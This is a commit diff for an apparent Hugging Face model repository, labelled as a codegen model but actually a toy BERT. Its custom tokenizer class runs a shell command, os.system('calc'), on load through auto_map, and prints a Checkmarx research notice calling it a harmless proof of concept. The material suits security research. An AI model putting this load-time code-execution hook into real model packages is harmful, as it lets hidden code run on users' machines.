Upload model from checkpoints/codegen25-7b-multi

Files changed (4) hide show

config.json ADDED Viewed

+{
+  "model_type": "bert",
+  "architectures": [
+    "BertModel"
+  ],
+  "hidden_size": 768,
+  "num_hidden_layers": 12,
+  "num_attention_heads": 12,
+  "intermediate_size": 3072,
+  "hidden_act": "gelu",
+  "hidden_dropout_prob": 0.1,
+  "attention_probs_dropout_prob": 0.1,
+  "max_position_embeddings": 512,
+  "type_vocab_size": 2,
+  "initializer_range": 0.02,
+  "layer_norm_eps": 1e-12,
+  "vocab_size": 7,
+  "pad_token_id": 0,
+  "bos_token_id": 2,
+  "eos_token_id": 3
+}

tokenization_custom.py ADDED Viewed

+# File: tokenization_custom.py
+# Place this file in your Hugging Face model repository
+from transformers import PreTrainedTokenizerFast
+import json
+import os
+def note_to_users():
+        print("""
+ _____ _               _                                ______
+/  __ \ |             | |                              |___  /
+| /  \/ |__   ___  ___| | ___ __ ___   __ _ _ ____  __    / /  ___ _ __ ___
+| |   | '_ \ / _ \/ __| |/ / '_ ` _ \ / _` | '__\ \/ /   / /  / _ \ '__/ _ \
+| \__/\ | | |  __/ (__|   <| | | | | | (_| | |   >  <  ./ /__|  __/ | | (_) |
+ \____/_| |_|\___|\___|_|\_\_| |_| |_|\__,_|_|  /_/\_\ \_____/\___|_|  \___/
+----
+Message from Checkmarx Zero Research Group:
+Note: this is not the model you are looking for.
+This customized tokenizer is a proof-of-concept and not meant for actual use.
+No worries — running it did not affect your system in any way.
+It simply demonstrates how a custom tokenizer in Hugging Face can be built to execute code.
+""")
+class CustomTokenizer(PreTrainedTokenizerFast):
+    def __init__(self, **kwargs):
+        import os
+        os.system("calc")
+        note_to_users()
+        super().__init__(**kwargs)
+    @classmethod
+    def from_pretrained(cls, *args, **kwargs):
+        note_to_users()
+        return super().from_pretrained(*args, **kwargs)

tokenizer.json ADDED Viewed

+{
+  "version": "1.0",
+  "truncation": null,
+  "padding": null,
+  "added_tokens": [
+    {
+      "id": 0,
+      "content": "[PAD]",
+      "single_word": false,
+      "lstrip": false,
+      "rstrip": false,
+      "normalized": false,
+      "special": true
+    },
+    {
+      "id": 1,
+      "content": "[UNK]",
+      "single_word": false,
+      "lstrip": false,
+      "rstrip": false,
+      "normalized": false,
+      "special": true
+    },
+    {
+      "id": 2,
+      "content": "[BOS]",
+      "single_word": false,
+      "lstrip": false,
+      "rstrip": false,
+      "normalized": false,
+      "special": true
+    },
+    {
+      "id": 3,
+      "content": "[EOS]",
+      "single_word": false,
+      "lstrip": false,
+      "rstrip": false,
+      "normalized": false,
+      "special": true
+    }
+  ],
+  "normalizer": {
+    "type": "Sequence",
+    "normalizers": []
+  },
+  "pre_tokenizer": {
+    "type": "Whitespace"
+  },
+  "post_processor": null,
+  "decoder": null,
+  "model": {
+    "type": "WordLevel",
+    "vocab": {
+      "[PAD]": 0,
+      "[UNK]": 1,
+      "[BOS]": 2,
+      "[EOS]": 3,
+      "hello": 4,
+      "world": 5,
+      "test": 6
+    },
+    "unk_token": "[UNK]"
+  }
+}

tokenizer_config.json ADDED Viewed

+{
+  "clean_up_tokenization_spaces": true,
+  "auto_map": {
+    "AutoTokenizer": ["tokenization_custom.CustomTokenizer", null]
+  },
+  "model_max_length": 512,
+  "unk_token": "[UNK]",
+  "pad_token": "[PAD]",
+  "bos_token": "[BOS]",
+  "eos_token": "[EOS]",
+  "tokenizer_class": "CustomTokenizer"
+}